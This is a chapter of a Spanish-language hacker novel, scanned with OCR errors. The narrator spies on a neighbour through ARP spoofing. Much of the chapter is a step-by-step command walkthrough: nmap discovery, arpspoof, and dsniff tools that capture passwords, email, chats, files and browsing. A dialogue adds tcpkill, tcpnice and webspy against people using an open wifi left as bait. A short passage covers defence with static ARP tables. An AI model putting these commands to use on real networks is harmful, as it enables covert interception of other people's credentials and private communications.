Capítulo 16: Nos acercamos a la vecina con dsniff

Mientras ella vigilaba yo había boteado mi lápiz, esta vez com BackTrack (http:/ / www .remote-exploit.org/ cgi-bin/ fileget?versión=bt3-usb) las herramien­ tas que necesitaba eran, digamos que más informales y aunque todas están en esta formidable distro (https:/ / wiki.remote-exploit .org/ backtrack /wiki/ Alphabetical) en este capítulo se actuará como si se instalaran en el HD. Primero, qué menosque conocer la ip de mi improvisado equipo :

# ifconfig

Y ver las máquinas que hay en la red en la que me encuentro :

# nmap -sP 192.168.1.0/24

Baj o e instalo arp-sk-0.0.16.tgz (http:/ / sid .rstack.org/ arp-sk/ ) ju nto con libnet l y el paquete que nos va a permitir husmear por la red para intentar descubrir datos del paradero de mi vecina .

# apt-get install dsniff

Activo forwarding para que los paquetes vayan a sus verdaderos destinatarios:

# echo 1 > /proc /sys/net/ipv4/ip_forward

Y lanzo arpspoof para redirigir los paquetes del router a la máquina atacada y viceversa:

# arpspoof -i ethO -t 192.168.1.1 192.168.1.135 2> /dev/null &

# arpspoof -i ethO -t 192.168.1.135 192.168.1.1 2> /dev/null &

Para ver las todas posibilidades de ju gar, integrados en esta aplicación:

# dpkg -L dsniff 1     grep bin

Empiezo a abrir consolas,  las esparzo  por  la pantalla,  me  rooteo  en todas  y en cada una lanzo un proceso. Para esnifar contraseñas (si hay suerte, que no siempre ocurre):

# dsniff -m -i ethO

Si la red es inalámbrica sustituir “ethO” por “wlanO”. Con -m se intenta determinar el protocolo automáticamente a partir del archivo /usr/ share/ dsniff / dsniff.magic.

No lanzo “macof” porque no tengo la intención de dejar la red inservible pero sí para capturar tráfico nfs, correo (Outlook, Thunderbird ..) y sesiones de chat (Messenger, Yahoo, …):

# filesnarf -i ethO

# mailsnarf -i ethO

# msgsnarf -i ethO

Para analizar el tráfico ssh (Aunque, a veces, las contraseñas siendo correctas se detecten como “Password authentication failed”)

# sshow -i ethO

Ver todas las páginas que visita el husmeado:

# urlsnarf -i ethO
  • Oye, ¿sabes que los famosos protocolos de cifrado de contraseñas wifi, las famosas WEP y WPA, se craquean en menos que canta un gallo?
    • Y, ¿Qué?
    • Pues que las noches en las que no tengo nada que hacer voy de pesca …
    • ¿De pesca?
    • Dejo la wifi abierta (sin contraseña) y espero que alguien pique. Luego con dsniff me divierto un buen rato hasta que el piratilla se asquea…
    • Mira que eres malo
    • Con # tcpkill -i ethü host nombre_del_ host.com le mato conexiones, con

# tcpnice -A -i ethü tcp se las ralentizo y con # webspy -i ethü IP y en la barra del navegador pongo la IP del intruso veo por donde navega … Oye, es divertidísimo que te chupen wifi ….

  • Vaya pedazo de kcron estás hecho ….

Analizando todos los datos que arrojaba cada una de las terminales pudi­ mos averiguar un montón de cosas importantes. Desconectamos el equipo y lo volvimos a dejar todo como estaba. Salimos de nuestro escondite y nos dirigi­ mos a las dependencias 98 Milenium, en la quinta planta. Los pasillos estaban muy concurridos. Unos guardias de seguridad pasaron por nuestro lado y, por lo que comentaban, había algún intruso en la 7 planta. Sin duda nos buscaban a nosotros. El administrador  de la red, que se le supone “estar al tajo”, seguro que había detectado MACs duplicadas, síntoma de que alguien está fisgoneando donde no debe, con:

# arp -a

Yo, en mi pe antes de que me lo destrozaran, para evitar el envenenamiento ARP  había  creado tablas ARP estáticas:

# arp -s 192.168.2.2 00:35:4c:31:1A:12

O para hacerlo permanente:

# touch /etc/arp.conf

# nano /etc/arp.conf

Y en su interior poner la MAC (o MACs) del equipo y separado por un espacio la IP del/los pes:

00:35:4c:31 :lA:12 192.168.2.2

Se edita:

# nano /etc/network/interfaces

Y en la última línea se pone:

post-up /usr/sbin/arp -f /etc/arp.conf

En cuestiones de seguridad nada es infalible, pero siempre puedes tocarles los bzips a los curiosos. Mientras pasábamos por un pasillo flanqueado por grandes vidrieras que daban a estancias repletas de oficinistas, volvimos a ver a .(pun­ to)Antúnez. Nos mimetizamos con los que estaban esperando su turno alrededor de una máquina de café sin quitarle ojo de encima. Al rato salió, acompañado de otra persona con la que mantenía una animada charla. Entraron en el ascensor y descendieron hasta la planta -2. Hacia allí nos dirigimos. Por aquella planta no se veía un alma. Decidimos entrar por una puerta al azar.

  • ¡Alto! a qué departamento están adscritos… Nos asaltaron al abrir la puerta …
  • .dll
  • Esto está en la 3ª planta
  • Perdón … Cerramos.
  • ¿Te has fijado?
  • ¿Me engañó la vista o todos estaban atados a las sillas delante del monitor?
  • Viste bien … y les torturaban con el “tour de güindous” … Sssssshhhh … Se oyen pasos… ¡entremos aquí!

Nos metimos  en los servicios.

  • Precisamente buscaba  unos …
  • Ella tan tranquila haciendo sus necesidades …
  • ¡Pues no! Me permites coger un poco de papel…